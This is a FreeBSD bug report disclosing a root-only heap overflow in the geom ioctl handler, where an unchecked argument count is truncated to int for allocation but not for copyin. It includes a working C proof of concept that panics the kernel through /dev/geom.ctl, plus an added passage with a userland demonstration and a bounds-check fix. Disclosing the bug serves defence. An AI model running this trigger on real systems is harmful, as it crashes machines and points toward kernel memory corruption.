[Bug 209113] Heap overflow in geom ioctl handler
bugzilla-noreply at freebsd.org
Wed Apr 27 22:41:06 UTC 2016
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209113
Bug ID: 209113
Summary: Heap overflow in geom ioctl handler
Product: Base System
Version: 11.0-CURRENT
Hardware: Any
OS: Any
Status: New
Severity: Affects Only Me
Priority: ---
Component: kern
Assignee: freebsd-bugs at FreeBSD.org
Reporter: cturt at hardenedbsd.org
There is a heap overflow in the `ioctl` handler for `geom`, which is
non-critical since it is only triggerable as `root`.
Essentially, there are no checks on the user-supplied `req.narg` value. The
code uses this value to calculate a size by multiplying by `sizeof(struct
gctl_req_arg)`, and then calls `g_malloc` and `copyin` with it.
`g_malloc` treats its `size` parameter as an `int`:

```c
static __inline void *g_malloc(int size, int flags)
```

So this size is truncated to 32 bits, but the `copyin` call uses the full
64-bit size, and the kernel copies far more than it allocated.
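To make the narrowing concrete, the following is an added example, not code from the report or from the FreeBSD tree: it mirrors the `narg * sizeof(struct gctl_req_arg)` arithmetic in userland, shows the value `g_malloc` would see next to the value `copyin` would be handed, and provides the kind of bounds check that rejects such a request before any allocation. It assumes `struct gctl_req_arg` is 48 bytes (amd64) and uses a placeholder `MAX_NARG` limit; both are assumptions, not values from the report.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed sizeof(struct gctl_req_arg) on amd64; not taken from the report. */
#define ARG_SIZE 48u
/* Placeholder upper bound on argument count; a real limit is a policy choice. */
#define MAX_NARG 1024u

/* Size as copyin() would receive it: the full 64-bit product. */
size_t full_copy_size(uint32_t narg, size_t argsz) {
    return (size_t)narg * argsz;
}

/* Size as g_malloc(int size, ...) receives it: the same product narrowed
 * to int on the call, exactly the implicit conversion the report describes. */
int truncated_alloc_size(uint32_t narg, size_t argsz) {
    size_t full = (size_t)narg * argsz;
    int size = full;          /* implicit narrowing, as in g_malloc(int size, int flags) */
    return size;
}

/* Hardened variant: validate before allocating. Returns the byte count to
 * allocate and copy, or 0 if the request must be rejected. */
size_t safe_arg_bytes(uint32_t narg, size_t argsz) {
    if (narg == 0 || narg > MAX_NARG)
        return 0;                               /* absurd or empty argument count */
    if (argsz != 0 && narg > SIZE_MAX / argsz)
        return 0;                               /* product would wrap in size_t */
    size_t n = (size_t)narg * argsz;
    if (n > (size_t)INT_MAX)
        return 0;                               /* would not survive the int parameter */
    return n;
}

int main(void) {
    uint32_t narg = 0x5555556;                  /* the value used in the PoC */
    printf("copyin size : %zu\n", full_copy_size(narg, ARG_SIZE));
    printf("g_malloc size: %d\n", truncated_alloc_size(narg, ARG_SIZE));
    printf("validated    : %zu (0 = rejected)\n", safe_arg_bytes(narg, ARG_SIZE));
    return 0;
}
```

On a 64-bit build the first two lines differ by 2^32, which is the gap between what is allocated and what is copied.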
PoC to trigger the bug, resulting in panic (must be run as `root`):
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <geom/geom_ctl.h>

int main(void) {
    int result;
    struct gctl_req req;
    int g;

    g = open("/dev/geom.ctl", O_RDONLY);
    if (g == -1) {
        printf(" [-] Couldn't open geom.ctl!\n");
        return 1;
    }

    /* Buffer the kernel writes its error string into. */
    req.error = malloc(0x100);
    req.lerror = 2;
    req.version = GCTL_VERSION;
    /* Unchecked argument count: narg * sizeof(struct gctl_req_arg) no longer
     * fits in the int that g_malloc takes, while copyin uses the full size. */
    req.narg = 0x5555556;
    req.arg = malloc(0x4000);
    memset(req.arg, 'a', 0x4000);

    result = ioctl(g, GEOM_CTL, &req);
    printf("%d %d\n", result, errno);

    free(req.error);
    free(req.arg);
    close(g);
    return 0;
}
```